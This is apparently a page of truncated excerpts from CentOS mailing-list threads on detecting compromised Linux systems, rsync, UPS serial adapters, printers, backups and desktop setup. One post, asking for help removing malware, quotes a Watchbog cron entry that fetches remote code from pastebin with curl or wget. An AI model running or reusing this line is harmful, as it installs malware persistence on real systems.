similar to: how to know when a system is compromised

I have not, I'll look into that one, thanks! On 11/14/2019 9:48 AM, SternData wrote: > Do you run rkhunter? > > On 11/14/19 9:40 AM, Christopher Wensink wrote: >> How do you know when a Linux system has been compromised?? >> >> Every day I watch our systems with all the typical tools, ps, top, who, >> I watch firewall / IPS logs, I have logwatch setup and

This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC. Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so

Once upon a time, Leroy Tennison <leroy at datavoiceint.com> said: > The executable could be placed on mounted read-only media That's not as secure as you think. Linux bind mounts can mount a file over another file (plus there's overlay filesystems), so it's possible to replace a binary even on a read-only device. -- Chris Adams <linux at cmadams.net>

Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

On 2019-11-14 10:01, Christopher Wensink wrote: > I have not, I'll look into that one, thanks! > > On 11/14/2019 9:48 AM, SternData wrote: >> Do you run rkhunter? >> >> On 11/14/19 9:40 AM, Christopher Wensink wrote: >>> How do you know when a Linux system has been compromised? I'm sure you have followed the procedure how to install system and

Do you run rkhunter? On 11/14/19 9:40 AM, Christopher Wensink wrote: > How do you know when a Linux system has been compromised?? > > Every day I watch our systems with all the typical tools, ps, top, who, > I watch firewall / IPS logs, I have logwatch setup and mailing daily > summaries to me and I dive deeper into logs if something looks suspicious. > > What am I missing

Hi Leroy, How I can confirm that during rsync transfer corruption are not encountered? Thank you in advance. Il 01/07/20 16:04, Leroy Tennison ha scritto: > I've used rsync (but probably not for the size you're referring to), it works and has enough features to meet most needs. I have had a single situation where corruption occurred during transfer (a few times, have no idea why),

Hello guys, Whats is the best way to identify a possible user using a botnet with php in the server? And if he is using GET commands for example in other server. Does apache logs outbound conections ? If it is using a file that is not malicious the clam av would not identify. Thanks

Without context it's impossible to make firm statements but, having gone through this a while back (and discovering that less than 1 percent of an examined list of connections couldn't support current ssl - mainly Apple hardware), who do you want to protect? Is it the minority who won't/can't upgrade or the majority who have? And, do you have to protect yourself from liability

I need to connect an older APS UPS unit to a machine running CentOS 7. Unfortunately the UPS only has a serial port whereas the computer does not. I am aware that there are USB-serial adapters but that the hardware or the drivers might fall short of expectations. Does anyone have positive experience with such an adapter? Or, conversely, would recommend avoid a particular adapter?

Hi everyone, I have updated my backup server to CentOS 8.2. It runs bacula performing backup on disks. I would like to replicate backups on another offsite machine. I read about the ability to configure a new storage daemon in the offsite location and create a Migration/Copy Jobs. If I'm not wrong, it replicates only volumes but not replicate the catalog. I will try this. Another way to

Is it possible with "chage" to configure a password caducity for, at most, 2 hours? I think "chage" only allows caducity for, at least, one day.

On 2020-07-08 10:23, Leroy Tennison wrote: > I've used one on a Linux laptop, it "just worked" but the OS wasn't CentOS 7. > It is not clear if you used USB from APC UPS to USB port on the machine side or USB - to - "serial". USB to USB with standard USB cable will work. If one uses serial to USB adapter on the machine side (to create serial port through USB

On Sat, 2020-06-27 at 15:44 -0600, Frank Cox wrote: > On Sat, 27 Jun 2020 17:33:39 -0400 > Jay Hart wrote: > > > > > If you had to rate which printer brand works better with Linux > > (Fedora and > > Centos), what would it be? > Any Brother printer that I've ever had the misfortune to have to deal > with either didn't work at all or if could be made

Il 01/07/20 17:13, Leroy Tennison ha scritto: > I realize this shouldn't happen, the file is a tgz and isn't being modified while being transmitted. This has happened maybe three times this year and unfortunately I've just had to deal with it rather than invest the time to do the research. > > > Harriscomputer > > Leroy Tennison > Network Information/Cyber

> On Wed, 2020-03-25 at 14:39 +0000, Leroy Tennison wrote: >> Since you state that using -z is almost always a bad idea, could you >> provide the rationale for that? I must be missing something. >> > I think the "rationale" is that at some point the > compression/decompression takes longer than the time reduction from > sending a compressed file. It

There was a thread about C7 bash completion back in August last year, but it doesn't have answers for this problem. Example: "yum install /path/to/local/package" works fine with tab completion to fill in the path and package bits. However, "yum --debuglevel="1" install ..." just gets stuck and doesn't offer anything. The only option is to type everything

This is unfortunate. https://wiki.libvirt.org/page/TroubleshootMacvtapHostFail To the "normal" user - BRIDGE means guest is on the same network and has access to the host. Bummer. Jerry

Let me start out by making clear I *LOATHE* gnome, ok? So I don't want to hear about it. What's happening is this: I did this: yum groupinstall "Development and Creative Workstation" yum groupinstall "KDE Plasma Workspaces" Now, when I go in graphical mode, I try to change to kde on login. Nope - minutes later, I can see a cursor, and a gray screen. Ditto on the